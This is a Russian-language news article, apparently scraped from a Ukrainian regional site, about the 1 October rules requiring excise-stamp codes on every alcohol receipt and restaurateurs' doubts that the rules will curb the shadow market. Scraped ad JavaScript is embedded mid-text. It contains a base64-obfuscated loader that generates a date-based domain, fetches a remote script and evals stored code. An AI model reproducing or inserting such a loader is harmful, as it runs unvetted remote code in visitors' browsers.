Ждать заказа придется дольше, чеки поменяли: как новые правила продажи алкоголя повлияют на потребителей

С 1 октября рестораны и магазины должны отчитываться за каждую бутылку и указывать данные ее акцизной марки в чеке. Некоторые клиенты уже столкнулись с неудобствами.

Соответствующие изменения в реализации алкоголя вступили в силу по всей территории Украины. Что поменялось для потребителей, рассказывает Акцент со ссылкой на Обозреватель.

Что изменилось в продаже алкоголя с 1 октября?

В июне Министерство финансов издало приказ № 329, в котором описаны новые правила продажи алкоголя с 1 октября. Сотрудники магазинов и ресторанов при продаже любого алкоголя должны вносить в чек штрих-код товара и цифровое значение штрихового кода марки акцизного налога – так называемый акцизный код.

Если магазин должен указывать в чеке все спиртное, то рестораторы – каждую новую бутылку, которую открывают. Например, для коктейля Aperol Spritz в ресторане в бокал наливают игристое из открытой бутылки, и Aperol – из новой. В чеке нужно указать лишь новую, только что открытую бутылку Aperol. Вносить информацию можно двумя путями: отсканировать марку либо внести данные вручную.

Зачем необходимы новые правила?

Государство борется с теневым рынком алкоголя, который занимает 30-50% продаж. Это миллиарды гривен потерь в бюджете. Фискалы рассчитывают, что неучтенного спиртного будут завозить меньше, поскольку его негде будет продавать.

«С учетом того, что диджитализация в Украине проходит исключительно в целях удобства работы налоговой и других фискалов, то каждая операция, каждый чек передается в режиме онлайн в налоговую. И если вы думаете, что ничего не нарушаете и этого никто не замечает, то глубоко ошибаетесь», – говорит собственник компании «Витис Групп» Сергей Мазур. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Как это повлияет на потребителей?

Им придется дольше ждать, а этого гости ресторанов или покупатели магазинов не любят. Если ресторан крупный и поступает много заказов, то данные по каждой бутылке нужно вносить быстро, говорит генеральный директор компании «Ресторанный консалтинг» Ольга Насонова. Многие посетители заказывают бутылку вина на двоих-троих либо по несколько коктейлей на человека. И каждый напиток нужно указать в чеке еще во время заказа. Проблема в том, что сканнеры пока работают плохо и вводить все данные нужно вручную. Новые правила не распространяются на продажу пива.

Министерство финансов уточнило, что штрафовать рестораны и магазины из-за несоблюдения новых правил пока не будут.

Почему это не будет работать?

Совладелица ведьма-бара «Лысая гора» Олеся Остафиева сразу вспомнила экс-мэра Леонида Черновецкого и его борьбу с МАФами. «Когда он огласил войну МАФам, их в Киеве насчитывалось 6 тысяч, а на четвертом году войны их было уже 13 тысяч. Бесконечная война, в которой несомненно были свои победители. Ведь не так просто получить разрешение на новый МАФ, когда в городе целая война против них. Но как-то 7 тысяч разрешений за 4 года появилось», – говорит она.

Так и с войной против теневого рынка алкоголя – знают масштабы, знают как и почему. Даже знают, кто. Но войну объявляют совершенно на другом фронте. И где-то обязательно есть победители, но к налогоплательщикам это никакого отношения не имеет, говорит Остафиева.

Продавать алкоголь можно нелегально – проверить это никто не сможет, рассказывают опрошенные рестораторы. Для этого достаточно просто не вбивать напиток в чек либо указывать его как сок, чай или узвар. И никто не сможет это проверить – потребители не будут жаловаться в налоговую администрацию. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/zhdat-zakaza-pridetsya-dolshe-cheki-pomenyali-kak-novye-pravila-prodazhi-alkogolya-povliyayut-na-potrebitelej/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет

Добавить комментарий

scroll to top